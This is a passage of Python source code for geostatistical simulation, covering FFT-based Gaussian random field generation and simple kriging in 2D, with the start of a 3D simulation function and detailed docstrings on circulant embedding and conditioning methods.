F(j,k) = [exp( -i*2*pi*(j^t*k)/(N1*N2) )], j=(j1,j2), k=(k1,k2) in G,
and
G = {n=(n1,n2), 0 <= n1 <= N1-1, 0 <= n2 <= N2-1}
denotes the indices grid
and where we use the bijection
(n1,n2) in G -> n1 + n2 * N1 in {0,...,N1*N2-1},
between the multiple-indices and the single indices
With N = N1*N2, we have
F^(-1) = 1/N * F^(*)
where ^(*) denotes the conjugate transpose
Let
Q = 1/N^(1/2) * F
Then Q is unitary, i.e. Q^(-1) = Q^(*)
Then, we have
DFT = F = N^(1/2) * Q
DFT^(-1) = 1/N * F^(*) = 1/N^(1/2) * Q^(*)
Using numpy package in python3, we have
numpy.fft.fft2() = DFT
numpy.fft.ifft2() = DFT^(-1)
"""
# Check first argument and get covariance function
if cov_model.__class__.__name__ == 'function':
# covariance function is given
cov_func = cov_model
range_known = False
elif cov_model.__class__.__name__ == 'CovModel2D':
cov_func = cov_model.func() # covariance function
range_known = True
else:
print("ERROR: 'cov_model' (first argument) is not valid")
return
# Number of realization(s)
nreal = int(nreal) # cast to int if needed
if nreal <= 0:
if printInfo:
print('GRF2D: nreal = 0: nothing to do!')
return()
if printInfo:
print('GRF2D: Preliminary computation...')
#### Preliminary computation ####
nx, ny = dimension
dx, dy = spacing
# ox, oy = origin
nxy = nx*ny
if method not in (1, 2, 3):
print('ERROR (GRF2D): invalid method')
return
if method == 2:
print('ERROR (GRF2D): Unconditional simulation: "method=2" not implemented...')
return
if x is not None:
if conditioningMethod not in (1, 2):
print('ERROR (GRF2D): invalid method for conditioning')
return
x = np.asarray(x).reshape(-1,2) # cast in 1-dimensional array if needed
v = np.asarray(v).reshape(-1) # cast in 1-dimensional array if needed
mean = np.asarray(mean).reshape(-1) # cast in 1-dimensional array if needed
if mean.size != 1:
if mean.size != nxy:
print('ERROR (GRF2D): number of entry for "mean"...')
return
mean = np.asarray(mean).reshape(ny, nx) # cast in 2-dimensional array of same shape as grid
if var is not None:
var = np.asarray(var).reshape(-1) # cast in 1-dimensional array if needed
if var.size != 1:
if var.size != nxy:
print('ERROR (GRF2D): number of entry for "var"...')
return
var = np.asarray(var).reshape(ny, nx) # cast in 2-dimensional array of same shape as grid
if not crop:
if x is not None: # conditional simulation
print('ERROR (GRF2D): "no crop" is not valid with conditional simulation')
return
if mean.size > 1:
print('ERROR (GRF2D): "no crop" is not valid with non stationary mean')
return
if var is not None and var.size > 1:
print('ERROR (GRF2D): "no crop" is not valid with non stationary variance')
return
if extensionMin is None:
# default extensionMin
if range_known:
# ... based on range of covariance model
extensionMin = [extension_min(r, n, s) for r, n, s in zip(cov_model.rxy(), dimension, spacing)]
else:
# ... based on dimension
extensionMin = [nx-1, ny-1]
N1min = nx + extensionMin[0]
N2min = ny + extensionMin[1]
if printInfo:
print('GRF2D: Computing circulant embedding...')
# Circulant embedding of the covariance matrix
# --------------------------------------------
# The embedding matrix is a (N1,N2)-nested block circulant matrix, computed from
# the covariance function.
# To take a maximal benefit of Fast Fourier Transform (FFT) for computing DFT,
# we choose
# N1 = 2^g1 (a power of 2), with N1 >= N1min
# N2 = 2^g2 (a power of 2), with N2 >= N2min
g1 = int(np.ceil(np.log2(N1min)))
g2 = int(np.ceil(np.log2(N2min)))
N1 = int(2**g1)
N2 = int(2**g2)
if printInfo:
print('GRF2D: Embedding dimension: {} x {}'.format(N1, N2))
N = N1*N2
# ccirc: coefficient of the embedding matrix (N2, N1) array
L1 = int (N1/2)
L2 = int (N2/2)
h1 = np.arange(-L1, L1, dtype=float) * dx # [-L1 ... 0 ... L1-1] * dx
h2 = np.arange(-L2, L2, dtype=float) * dy # [-L2 ... 0 ... L2-1] * dy
hh = np.meshgrid(h1, h2)
ccirc = cov_func(np.hstack((hh[0].reshape(-1,1), hh[1].reshape(-1,1))))
ccirc.resize(N2, N1)
del(h1, h2, hh)
# ...shift first L1 index to the end of the axis 1:
ind = np.arange(L1)
ccirc = ccirc[:, np.hstack((ind+L1, ind))]
# ...shift first L2 index to the end of the axis 0:
ind = np.arange(L2)
ccirc = ccirc[np.hstack((ind+L2, ind)), :]
del(ind)
if printInfo:
print('GRF2D: Computing FFT of circulant matrix...')
# Compute the Discrete Fourier Transform (DFT) of ccric, via FFT
# --------------------------------------------------------------
# The (2-dimensional) DFT coefficients
# lam = DFT(ccirc) = {lam(k1,k2), 0<=k1<=N1-1, 0<=k2<=N2-1}
# are the eigen values of the embedding matrix.
# We have:
# a) lam are real coefficients, because the embedding matrix is symmetric
# b) lam(k1,k2) = lam(N1-k1,N2-k2), 1<=k1<=N1-1, 1<=k2<=N2-1, because the coefficients ccirc are real
lam = np.real(np.fft.fft2(ccirc))
# ...note that the imaginary parts are equal to 0
# Eventual use of approximate embedding
# -------------------------------------
# If some DFT coefficients are negative, then set them to zero
# and update them to fit the marginals distribution (approximate embedding)
if np.min(lam) < 0:
lam = np.sum(lam)/np.sum(np.maximum(lam, 0.)) * np.maximum(lam, 0.)
# Take the square root of the (updated) DFT coefficients
# ------------------------------------------------------
lamSqrt = np.sqrt(lam)
if x is None or conditioningMethod == 1:
del(lam)
# For specified variance
# ----------------------
# Compute updating factor
if var is not None:
varUpdate = np.sqrt(var/cov_func(np.zeros(2)))
# Dealing with conditioning
# -------------------------
if x is not None:
if printInfo:
print('GRF2D: Treatment of conditioning data...')
# Compute the part rAA of the covariance matrix
# + +
# | rAA rAB |
# r = | |
# | rBA rBB |
# + +
# where index A (resp. B) refers to
# conditioning (resp. non-conditioning) index in the grid.
if printInfo:
print('GRF2D: Computing covariance matrix (rAA) for conditioning locations...')
# Compute
# indc: node index of conditioning node (nearest node)
indc = np.asarray(np.floor((x-origin)/spacing), dtype=int) # multiple-indices: size n x 2
ix, iy = indc[:, 0], indc[:, 1]
if sum(ix < 0) > 0 or sum(ix >= nx):
print('ERROR (GRF2D): a conditioning point is out of the grid (x-direction)')
return
if sum(iy < 0) > 0 or sum(iy >= ny):
print('ERROR (GRF2D): a conditioning point is out of the grid (y-direction)')
return
indc = ix + iy * nx # single-indices
if len(np.unique(indc)) != len(x):
print('ERROR (GRF2D): more than one conditioning point in a same grid cell')
nc = len(x)
# rAA
rAA = np.zeros((nc, nc))
diagEntry = ccirc[0, 0] + measureErrVar
for i in range(nc):
rAA[i,i] = diagEntry
for j in range(i+1, nc):
rAA[i,j] = ccirc[np.mod(iy[j]-iy[i], N2), np.mod(ix[j]-ix[i], N1)]
rAA[j,i] = rAA[i,j]
# Test if rAA is almost singular...
if 1./np.linalg.cond(rAA) < tolInvKappa:
print('ERROR (GRF2D): conditioning issue: condition number of matrix rAA is too big')
return
# Compute:
# indnc: node index of non-conditioning node (nearest node)
indnc = np.asarray(np.setdiff1d(np.arange(nxy), indc), dtype=int)
nnc = len(indnc)
ky = np.floor_divide(indnc, nx)
kx = np.mod(indnc, nx)
if conditioningMethod == 1:
# Method ConditioningA
# --------------------
if printInfo:
print('GRF2D: Computing covariance matrix (rBA) for non-conditioning / conditioning locations...')
# Compute the parts rBA of the covariance matrix (see above)
# rBA
rBA = np.zeros((nnc, nc))
for j in range(nc):
rBA[:,j] = ccirc[np.mod(iy[j] - ky, N2), np.mod(ix[j] - kx, N1)]
if printInfo:
print('GRF2D: Computing rBA * rAA^(-1)...')
# compute rBA * rAA^(-1)
rBArAAinv = np.dot(rBA, np.linalg.inv(rAA))
del(rAA, rBA)
# If a variance var is specified, then the matrix r should be updated
# by the following operation:
# diag((var/cov_func(0))^1/2) * r * diag((var/cov_func(0))^1/2)
# Hence, if a non stationary variance is specified,
# the matrix rBA * rAA^(-1) should be consequently updated
# by multiplying its columns by 1/varUpdate[indc] and its rows by varUpdate[indnc]
if var is not None and var.size > 1:
rBArAAinv = np.transpose(varUpdate.reshape(-1)[indnc] * np.transpose(1./varUpdate.reshape(-1)[indc] * rBArAAinv))
elif conditioningMethod == 2:
# Method ConditioningB
# --------------------
if printInfo:
print('GRF2D: Computing index in the embedding grid for non-conditioning / conditioning locations...')
# Compute index in the embedding grid for indc and indnc
# (to allow use of fft)
indcEmb = iy * N1 + ix
indncEmb = ky * N1 + kx
del(ix, iy, kx, ky)
del(ccirc)
#### End of preliminary computation ####
# Unconditional simulation
# ========================
# Method A: Generating one real GRF Z
# --------
# 1. Generate a real gaussian white noise W ~ N(0,1) on G (2D grid)
# 2. Compute Z = Q^(*) D Q * W
# [OR: Z = Q D Q^(*) * W], where
# Q is normalized DFT matrix
# D = diag(lamSqrt)
# i.e:
# Z = DFT^(-1)(D * DFT(W))
# [OR: Z = DFT(D * DFT^(-1)(W))]
#
# Method B: Generating one real GRF Z
# --------
# Not implemented
#
# Method C: Generating two independent real GRFs Z1, Z2
# --------
# (If nreal is odd, the last realization is generated using method A.)
# 1. Generate two independent real gaussian white noises W1,W2 ~ N(0,1) on G (2D grid)
# and let W = W1 + i * W2 (complex value)
# 2. Compute Z = Q^(*) D * W
# [OR: Z = Q D * W], where
# Q is normalized DFT matrix
# D = diag(lamSqrt)
# i.e:
# Z = N^(1/2) * DFT^(-1)(D * W)
# [OR: Z = 1/N^(1/2) * DFT(D * W)]
# Then the real and imaginary parts of Z are two independent GRFs
if crop:
grfNx, grfNy = nx, ny
else:
grfNx, grfNy = N1, N2
grf = np.zeros((nreal, grfNy, grfNx))
if method == 1:
# Method A
# --------
for i in range(nreal):
if printInfo:
print('GRF2D: Unconditional simulation {:4d} of {:4d}...'.format(i+1, nreal))
W = np.random.normal(size=(N2, N1))
Z = np.fft.ifft2(lamSqrt * np.fft.fft2(W))
# ...note that Im(Z) = 0
grf[i] = np.real(Z[0:grfNy, 0:grfNx])
elif method == 2:
# Method B
# --------
print('ERROR (GRF2D): Unconditional simulation: "method=2" not implemented...')
return
elif method == 3:
# Method C
# --------
for i in np.arange(0, nreal-1, 2):
if printInfo:
print('GRF2D: Unconditional simulation {:4d}-{:4d} of {:4d}...'.format(i+1, i+2, nreal))
W = np.array(np.random.normal(size=(N2, N1)), dtype=complex)
W.imag = np.random.normal(size=(N2, N1))
Z = np.sqrt(N) * np.fft.ifft2(lamSqrt * W)
# Z = 1/np.sqrt(N) * np.fft.fft2(lamSqrt * W)] # see above: [OR:...]
grf[i] = np.real(Z[0:grfNy, 0:grfNx])
grf[i+1] = np.imag(Z[0:grfNy, 0:grfNx])
if np.mod(nreal, 2) == 1:
if printInfo:
print('GRF2D: Unconditional simulation {:4d} of {:4d}...'.format(nreal, nreal))
W = np.random.normal(size=(N2, N1))
Z = np.fft.ifft2(lamSqrt * np.fft.fft2(W))
# ...note that Im(Z) = 0
grf[nreal-1] = np.real(Z[0:grfNy, 0:grfNx])
if var is not None:
grf = varUpdate * grf
grf = mean + grf
# Conditional simulation
# ----------------------
# Let
# A: index of conditioning nodes
# B: index of non-conditioning nodes
# Zobs: vector of values at conditioning nodes
# and
# + +
# | rAA rAB |
# r = | |
# | rBA rBB |
# + +
# the covariance matrix, where index A (resp. B) refers to
# conditioning (resp. non-conditioning) index in the grid.
#
# Then, from an unconditional simulation Z, we retrieve a conditional
# simulation ZCond as follows.
# Let
# ZCond[A] = Zobs
# ZCond[B] = Z[B] + rBA * rAA^(-1) * (Zobs - Z[A])
if x is not None:
# We work with single indices...
grf.resize(nreal, grfNx*grfNy)
if conditioningMethod == 1:
# Method ConditioningA
# --------------------
if printInfo:
print('GRF2D: Updating conditional simulations...')
# Update all simulations at a time,
# use the matrix rBA * rAA^(-1) already computed
grf[:,indnc] = grf[:,indnc] + np.transpose(np.dot(rBArAAinv, np.transpose(v - grf[:,indc])))
grf[:,indc] = v
elif conditioningMethod == 2:
# Method ConditioningB
# --------------------
# Update each simulation successively as follows:
# - solve rAA * x = Zobs - z[A]
# - do the multiplication rBA * x via the circulant embedding of the
# covariance matrix (using fft)
rAAinvResiduEmb = np.zeros(N2*N1)
for i in range(nreal):
if printInfo:
print('GRF2D: Updating conditional simulation {:4d} of {:4d}...'.format(i+1, nreal))
# Compute residue
residu = v - grf[i,indc]
# ... update if non stationary variance is specified
if var is not None and var.size > 1:
residu = 1./varUpdate.reshape(-1)[indc] * residu
# Compute
# x = rAA^(-1) * residu, and then
# Z = rBA * x via the circulant embedding of the covariance matrix
rAAinvResiduEmb[indcEmb] = np.linalg.solve(rAA, residu)
Z = np.fft.ifft2(lam * np.fft.fft2(rAAinvResiduEmb.reshape(N2, N1)))
# ...note that Im(Z) = 0
Z = np.real(Z.reshape(-1)[indncEmb])
# ... update if non stationary covariance is specified
if var is not None and var.size > 1:
Z = varUpdate.reshape(-1)[indnc] * Z
grf[i, indnc] = grf[i, indnc] + Z
grf[i, indc] = v
# Reshape grf as initially
grf.resize(nreal, grfNy, grfNx)
return (grf)
# ----------------------------------------------------------------------------
# ----------------------------------------------------------------------------
def krige2D(x, v, cov_model, dimension, spacing, origin=[0., 0.],
            mean=0, var=None,
            extensionMin=None,
            conditioningMethod=1, # note: set conditioningMethod=2 if unable to allocate memory
            measureErrVar=0., tolInvKappa=1.e-10,
            computeKrigSD=True,
            printInfo=True):
    """
    Computes kriging estimates and standard deviation in 2D via FFT.
    It is a simple kriging
        - of value v at location x,
        - based on the covariance model / function,
        - with a specified mean (mean) and variance (var), which can be non stationary
    Notes:
    1) For reproducing the covariance model, the dimension of field/domain should be
    large enough; let K be an integer such that K*spacing is greater than or equal
    to the correlation range, then
        - correlation across opposite borders should be removed by extending
            the domain sufficiently, i.e.
                extensionMin >= K - 1
        - two nodes should not be correlated simultaneously regarding both
            distances between them (with respect to the periodic grid),
            i.e. one should have
                dimension+extensionMin >= 2*K - 1,
    To sum up, extensionMin should be chosen such that
        dimension+extensionMin >= max(dimension, K) + K - 1
    i.e.
        extensionMin >= max(K-1, 2*K-dimension-1)
    2) For large data sets:
        - conditioningMethod should be set to 2 for using FFT
        - measureErrVar could be set to a small positive value to stabilize
            the covariance matrix (solving linear system)
    :param x:           (2-dimensional array of dim n x 2) coordinates of data points
    :param v:           (1-dimensional array of length n) value at data points
    :param cov_model:   covariance model, it can be:
                            (function) covariance function f(h), where
                                h: (2-dimensional array of dim n x 2, or
                                1-dimensional array of dim 2) are 2D-lag(s)
                            (CovModel2D class) covariance model in 2D, see
                                definition of the class in module geone.covModel
    :param dimension:   (sequence of 2 ints) [nx, ny], number of cells
                            in x-, y-axis direction
    :param spacing:     (sequence of 2 floats) [dx, dy], spacing between
                            two adjacent cells in x-, y-axis direction
    :param origin:      (sequence of 2 floats) [ox, oy], origin of the 2D field
                            - used for localizing the conditioning points
    :param mean:        (float or ndarray) mean of the field:
                            - scalar for stationary mean
                            - ndarray for non stationary mean, must contain
                                nx*ny values (reshaped if needed)
    :param var:         (float or ndarray or None) variance of the field,
                            if not None: variance is updated
                            depending on the specified variance and the covariance
                            function, otherwise: only the covariance function is
                            used
                            - scalar for stationary variance
                            - array for non stationary variance, must contain
                                nx*ny values (reshaped if needed)
    :param extensionMin: (sequence of 2 ints) minimal extension in nodes in
                            x-, y-axis direction for embedding (see above),
                            None for default (automatically computed, based
                            on the ranges if a covariance model class is given
                            as third argument)
    :param conditioningMethod:
                        (int) indicates which method is used to perform kriging.
                        Let
                            A: index of conditioning (data) nodes
                            B: index of non-conditioning nodes
                        and
                                +         +
                                | rAA rAB |
                            r = |         |
                                | rBA rBB |
                                +         +
                        the covariance matrix, where index A (resp. B) refers
                        to conditioning (resp. non-conditioning) index in the
                        grid. Then, the kriging estimates and variance are
                            krig[B]    = mean + rBA * rAA^(-1) * (v - mean)
                            krigVar[B] = diag(rBB - rBA * rAA^(-1) * rAB)
                        The computation is done in a way depending on the
                        following possible values for conditioningMethod:
                            1: method ConditioningA:
                                the matrices rBA, rAA^(-1) are explicitly
                                computed (warning: could require large amount
                                of memory)
                            2: method ConditioningB:
                                for kriging estimates:
                                    the linear system
                                        rAA * y = (v - mean)
                                    is solved, and then
                                        mean + rBA*y
                                    is computed (product by rBA done via FFT)
                                for kriging variances:
                                    for each column u[j] of rAB, the linear
                                    system
                                        rAA * y = u[j]
                                    is solved, and then
                                        rBB[j,j] - u[j]^t*y
                                    is computed
    :param measureErrVar:
                        (float >=0) measurement error variance; we assume that
                        the error on conditioning data follows the distribution
                        N(0,measureErrVar*I); i.e. rAA + measureErrVar*I is
                        considered instead of rAA for stabilizing the linear
                        system for this matrix.
    :param tolInvKappa: (float >0) the function is stopped if the inverse of
                        the condition number of rAA is below tolInvKappa
    :param computeKrigSD:
                        (bool) indicates if the standard deviation of kriging is computed
    :param printInfo:   (bool) indicates if some info is printed in stdout
    :return ret:        two possible cases:
                            ret = [krig, krigSD] if computeKrigSD is equal to True
                            ret = krig           if computeKrigSD is equal to False
                        where
                            krig:   (2-dimensional array of dim ny x nx)
                                        kriging estimates
                            krigSD: (2-dimensional array of dim ny x nx)
                                        kriging standard deviation
                        (None is returned in case of error)
    NOTES:
        The Discrete Fourier Transform (DFT) of an array x of dim N1 x N2 is given by
            c = DFT(x) = F * x
        where F is the (N1*N2) x (N1*N2) matrix with coefficients
            F(j,k) = [exp( -i*2*pi*(j^t*k)/(N1*N2) )], j=(j1,j2), k=(k1,k2) in G,
        and
            G = {n=(n1,n2), 0 <= n1 <= N1-1, 0 <= n2 <= N2-1}
        denotes the indices grid, using the bijection
            (n1,n2) in G -> n1 + n2 * N1 in {0,...,N1*N2-1}
        between the multiple-indices and the single indices.
        With N = N1*N2, F^(-1) = 1/N * F^(*), where ^(*) denotes the conjugate
        transpose. Using the numpy package in python3:
            numpy.fft.fft2()  = DFT
            numpy.fft.ifft2() = DFT^(-1)
    """
    # Check third argument and get covariance function
    if cov_model.__class__.__name__ == 'function':
        # covariance function is given
        cov_func = cov_model
        range_known = False
    elif cov_model.__class__.__name__ == 'CovModel2D':
        cov_func = cov_model.func() # covariance function
        range_known = True
    else:
        print("ERROR: 'cov_model' (third argument) is not valid")
        return

    # Check conditioning method
    if conditioningMethod not in (1, 2):
        print('ERROR (KRIGE2D): invalid method!')
        return

    nx, ny = dimension
    dx, dy = spacing
    # ox, oy = origin

    nxy = nx*ny

    x = np.asarray(x).reshape(-1, 2) # cast in 2-dimensional array if needed
    v = np.asarray(v).reshape(-1) # cast in 1-dimensional array if needed

    mean = np.asarray(mean).reshape(-1) # cast in 1-dimensional array if needed
    if mean.size != 1:
        if mean.size != nxy:
            print('ERROR (KRIGE2D): number of entry for "mean"...')
            return
        mean = np.asarray(mean).reshape(ny, nx) # cast in 2-dimensional array of same shape as grid

    if var is not None:
        var = np.asarray(var).reshape(-1) # cast in 1-dimensional array if needed
        if var.size != 1:
            if var.size != nxy:
                print('ERROR (KRIGE2D): number of entry for "var"...')
                return
            var = np.asarray(var).reshape(ny, nx) # cast in 2-dimensional array of same shape as grid

    if extensionMin is None:
        # default extensionMin
        if range_known:
            # ... based on range of covariance model
            extensionMin = [extension_min(r, n, s) for r, n, s in zip(cov_model.rxy(), dimension, spacing)]
        else:
            # ... based on dimension
            extensionMin = [nx-1, ny-1]

    N1min = nx + extensionMin[0]
    N2min = ny + extensionMin[1]

    if printInfo:
        print('KRIGE2D: Computing circulant embedding...')

    # Circulant embedding of the covariance matrix
    # --------------------------------------------
    # The embedding matrix is a (N1,N2)-nested block circulant matrix, computed from
    # the covariance function.
    # To take a maximal benefit of Fast Fourier Transform (FFT) for computing DFT,
    # we choose
    #     N1 = 2^g1 (a power of 2), with N1 >= N1min
    #     N2 = 2^g2 (a power of 2), with N2 >= N2min
    g1 = int(np.ceil(np.log2(N1min)))
    g2 = int(np.ceil(np.log2(N2min)))
    N1 = int(2**g1)
    N2 = int(2**g2)

    if printInfo:
        print('KRIGE2D: Embedding dimension: {} x {}'.format(N1, N2))

    # ccirc: coefficients of the embedding matrix, (N2, N1) array
    L1 = int(N1/2)
    L2 = int(N2/2)
    h1 = np.arange(-L1, L1, dtype=float) * dx # [-L1 ... 0 ... L1-1] * dx
    h2 = np.arange(-L2, L2, dtype=float) * dy # [-L2 ... 0 ... L2-1] * dy

    hh = np.meshgrid(h1, h2)
    ccirc = cov_func(np.hstack((hh[0].reshape(-1,1), hh[1].reshape(-1,1))))
    ccirc.resize(N2, N1)

    del(h1, h2, hh)

    # ...shift first L1 indices to the end of axis 1:
    ind = np.arange(L1)
    ccirc = ccirc[:, np.hstack((ind+L1, ind))]
    # ...shift first L2 indices to the end of axis 0:
    ind = np.arange(L2)
    ccirc = ccirc[np.hstack((ind+L2, ind)), :]

    del(ind)

    if conditioningMethod == 2:
        # The DFT coefficients lam = DFT(ccirc) (the eigenvalues of the
        # embedding matrix) are needed only by method 2, to perform products
        # by rBA via FFT; they are real because the embedding matrix is
        # symmetric and the coefficients ccirc are real.
        if printInfo:
            print('KRIGE2D: Computing FFT of circulant matrix...')
        lam = np.real(np.fft.fft2(ccirc))
        # If some DFT coefficients are negative, set them to zero and rescale
        # the remaining ones (approximate embedding)
        if np.min(lam) < 0:
            lam = np.sum(lam)/np.sum(np.maximum(lam, 0.)) * np.maximum(lam, 0.)
    # (note: the square roots of the DFT coefficients, used for simulation,
    # are not needed for kriging)

    # For specified variance
    # ----------------------
    # Compute updating factor
    if var is not None:
        varUpdate = np.sqrt(var/cov_func(np.zeros(2)))

    # Kriging
    # -------
    # Let A be the index of the conditioning nodes, B the index of the
    # non-conditioning nodes, and
    #         +         +
    #         | rAA rAB |
    #     r = |         |
    #         | rBA rBB |
    #         +         +
    # the covariance matrix. The kriging estimates are
    #     mean + rBA * rAA^(-1) * (v - mean)
    # and the kriging standard deviation
    #     diag(rBB - rBA * rAA^(-1) * rAB)
    # Note: if a variance var is specified, the matrix r is implicitly updated
    # by diag((var/cov_func(0))^1/2) * r * diag((var/cov_func(0))^1/2), which
    # is accounted for by the pre-/post-scaling below.
    if printInfo:
        print('KRIGE2D: Computing covariance matrix (rAA) for conditioning locations...')

    # indc: node index of conditioning nodes (nearest node of each data point)
    indc = np.asarray(np.floor((x-origin)/spacing), dtype=int) # multiple-indices: size n x 2
    ix, iy = indc[:, 0], indc[:, 1]

    if np.any(ix < 0) or np.any(ix >= nx):
        print('ERROR (KRIGE2D): a conditioning point is out of the grid (x-direction)')
        return
    if np.any(iy < 0) or np.any(iy >= ny):
        print('ERROR (KRIGE2D): a conditioning point is out of the grid (y-direction)')
        return

    indc = ix + iy * nx # single-indices

    if len(np.unique(indc)) != len(x):
        print('ERROR (KRIGE2D): more than one conditioning point in a same grid cell')
        return # without this return, a (nearly) singular system was built anyway

    nc = len(x)

    # rAA: covariance matrix for conditioning locations
    # (measureErrVar stabilizes the diagonal)
    rAA = np.zeros((nc, nc))
    diagEntry = ccirc[0, 0] + measureErrVar
    for i in range(nc):
        rAA[i,i] = diagEntry
        for j in range(i+1, nc):
            rAA[i,j] = ccirc[np.mod(iy[j]-iy[i], N2), np.mod(ix[j]-ix[i], N1)]
            rAA[j,i] = rAA[i,j]

    # Test if rAA is almost singular...
    if 1./np.linalg.cond(rAA) < tolInvKappa:
        print('ERROR (KRIGE2D): conditioning issue: condition number of matrix rAA is too big')
        return

    # indnc: node index of non-conditioning nodes
    indnc = np.asarray(np.setdiff1d(np.arange(nxy), indc), dtype=int)
    nnc = len(indnc)

    ky = np.floor_divide(indnc, nx)
    kx = np.mod(indnc, nx)

    # Initialize
    krig = np.zeros(ny*nx)
    if computeKrigSD:
        krigSD = np.zeros(ny*nx)

    # Work with residues: v <- v - mean
    # (pre-scaled by 1/varUpdate for non stationary variance; the scaling and
    # the mean are restored at the end)
    if mean.size == 1:
        v = v - mean
    else:
        v = v - mean.reshape(-1)[indc]

    if var is not None and var.size > 1:
        v = 1./varUpdate.reshape(-1)[indc] * v

    if conditioningMethod == 1:
        # Method ConditioningA
        # --------------------
        if printInfo:
            print('KRIGE2D: Computing covariance matrix (rBA) for non-conditioning / conditioning locations...')

        # rBA: part of the covariance matrix between non-conditioning and
        # conditioning locations (see above)
        rBA = np.zeros((nnc, nc))
        for j in range(nc):
            rBA[:,j] = ccirc[np.mod(iy[j] - ky, N2), np.mod(ix[j] - kx, N1)]

        del(ix, iy, kx, ky)
        del(ccirc)

        if printInfo:
            print('KRIGE2D: Computing rBA * rAA^(-1)...')

        # compute rBA * rAA^(-1)
        rBArAAinv = np.dot(rBA, np.linalg.inv(rAA))

        del(rAA)
        if not computeKrigSD:
            del(rBA)

        # Compute kriging estimates
        if printInfo:
            print('KRIGE2D: computing kriging estimates...')

        krig[indnc] = np.dot(rBArAAinv, v)
        krig[indc] = v # residues; mean (and variance scaling) restored below

        if computeKrigSD:
            # Compute kriging standard deviation
            if printInfo:
                print('KRIGE2D: computing kriging standard deviation ...')

            for j in range(nnc):
                krigSD[indnc[j]] = np.dot(rBArAAinv[j,:], rBA[j,:])
            krigSD[indnc] = np.sqrt(np.maximum(diagEntry - krigSD[indnc], 0.))

            del(rBA)

    elif conditioningMethod == 2:
        # Method ConditioningB
        # --------------------
        if not computeKrigSD:
            del(ccirc)

        if printInfo:
            print('KRIGE2D: Computing index in the embedding grid for non-conditioning / conditioning locations...')

        # Compute index in the embedding grid for indc and indnc
        # (to allow use of fft)
        indcEmb = iy * N1 + ix
        indncEmb = ky * N1 + kx

        # Compute kriging estimates
        if printInfo:
            print('KRIGE2D: computing kriging estimates...')

        # Compute
        #    u = rAA^(-1) * v, and then
        #    Z = rBA * u via the circulant embedding of the covariance matrix
        uEmb = np.zeros(N2*N1)
        uEmb[indcEmb] = np.linalg.solve(rAA, v)
        Z = np.fft.ifft2(lam * np.fft.fft2(uEmb.reshape(N2, N1)))
        # ...note that Im(Z) = 0
        krig[indnc] = np.real(Z.reshape(-1)[indncEmb])
        krig[indc] = v # residues; mean (and variance scaling) restored below

        if computeKrigSD:
            # Compute kriging standard deviation
            if printInfo:
                print('KRIGE2D: computing kriging standard deviation ...')

            for j in range(nnc):
                u = ccirc[np.mod(iy - ky[j], N2), np.mod(ix - kx[j], N1)] # j-th row of rBA
                krigSD[indnc[j]] = np.dot(u, np.linalg.solve(rAA, u))

            del(ccirc)

            krigSD[indnc] = np.sqrt(np.maximum(diagEntry - krigSD[indnc], 0.))

        del(ix, iy, kx, ky)

    # ... update if a variance var is specified
    if var is not None:
        if var.size > 1:
            # non stationary variance: post-scale the estimated residues
            # (the stationary scaling cancels in rBA * rAA^(-1))
            krig = varUpdate.reshape(-1) * krig
        if computeKrigSD:
            krigSD = varUpdate.reshape(-1) * krigSD

    krig.resize(ny, nx)
    if computeKrigSD:
        krigSD.resize(ny, nx)

    krig = krig + mean

    if computeKrigSD:
        return ([krig, krigSD])
    else:
        return (krig)
# ----------------------------------------------------------------------------
# ----------------------------------------------------------------------------
def grf3D(cov_model, dimension, spacing, origin=[0., 0., 0.],
nreal=1, mean=0, var=None,
x=None, v=None,
extensionMin=None, crop=True,
method=3, conditioningMethod=2,
measureErrVar=0., tolInvKappa=1.e-10,
printInfo=True):
"""
Generates gaussian random fields (GRF) in 3D via FFT.
The GRFs:
- are generated using the given covariance model / function,
- have specified mean (mean) and variance (var), which can be non stationary
- are conditioned to location x with value v
Notes:
1) For reproducing covariance model, the dimension of GRF should be large
enough; let K an integer such that K*spacing is greater or equal to the
correlation range, then
- correlation accross opposite border should be removed by extending
the domain sufficiently, i.e.
extensionMin >= K - 1
- two nodes could not be correlated simultaneously regarding both distances
            between them (with respect to the periodic grid), i.e. one should have
dimension+extensionMin >= 2*K - 1,
To sum up, extensionMin should be chosen such that
dimension+extensionMin >= max(dimension, K) + K - 1
i.e.
extensionMin >= max(K-1,2*K-dimension-1)
2) For large conditional simulations with large data set:
- conditioningMethod should be set to 2 for using FFT in conditioning step
- measureErrVar could be set to a small positive value to stabilize
the covariance matrix for conditioning locations (solving linear system)
:param cov_model: covariance model, it can be:
(function) covariance function f(h), where
h: (2-dimensional array of dim n x 3, or
1-dimensional array of dim 3) are 3D-lag(s)
(CovModel3D class) covariance model in 3D, see
definition of the class in module geone.covModel
:param dimension: (sequence of 3 ints) [nx, ny, nz], number of cells
in x-, y-, z-axis direction
:param spacing: (sequence of 3 float) [dx, dy, dz], spacing between
two adjacent cells in x-, y-, z-axis direction
    :param origin:        (sequence of 3 float) [ox, oy, oz], origin of the 3D field
- used for localizing the conditioning points
:param nreal: (int) number of realizations
:param mean: (float or ndarray) mean of the GRF:
- scalar for stationary mean
- ndarray for non stationary mean, must contain
nx*ny*nz values (reshaped if needed)
:param var: (float or ndarray or None) variance of the GRF,
if not None: variance of GRF is updated
depending on the specified variance and the covariance
function, otherwise: only the covariance function is
used
- scalar for stationary variance
- array for non stationary variance, must contain
nx*ny*nz values (reshaped if needed)
:param x: (2-dimensional array of dim n x 3, or
1-dimensional array of dim 3 or None) coordinate of
conditioning points (None for unconditional GRF)
:param v: (1-dimensional array or float or None) value at
conditioning points (length n)
:param extensionMin: (sequence of 3 ints) minimal extension in nodes in
in x-, y-, z-axis direction for embedding (see above)
None for default (automatically computed, based
on the ranges if covariance model class is given
as first argument)
:param crop: (bool) indicates if the extended generated field will
be cropped to original dimension; note that no cropping
is not valid with conditioning or non stationary mean
or variance
:param method: (int) indicates which method is used to generate
unconditional simulations; for each method the DFT "lam"
of the circulant embedding of the covariance matrix is
used, and periodic and stationary GRFs are generated;
possible values:
1: method A:
generate one GRF Z as follows:
- generate one real gaussian white noise W
- apply fft (or fft inverse) on W to get X
- multiply X by lam (term by term)
- apply fft inverse (or fft) to get Z
2: method B: NOT IMPLEMENTED!!!
generate one GRF Z as follows:
- generate directly X (of method A)
- multiply X by lam (term by term)
- apply fft inverse (or fft) to get Z
3: method C:
generate two independent GRFs Z1, Z2 as follows:
- generate two independant real gaussian white
noises W1, W2 and set W = W1 + i * W2
- apply fft (or fft inverse) on W to get X
- multiply X by lam (term by term)
- apply fft inverse (or fft) to get Z,
and set Z1 = Re(Z), Z2 = Im(Z)
note: if nreal is odd, the last field is
generated using method A
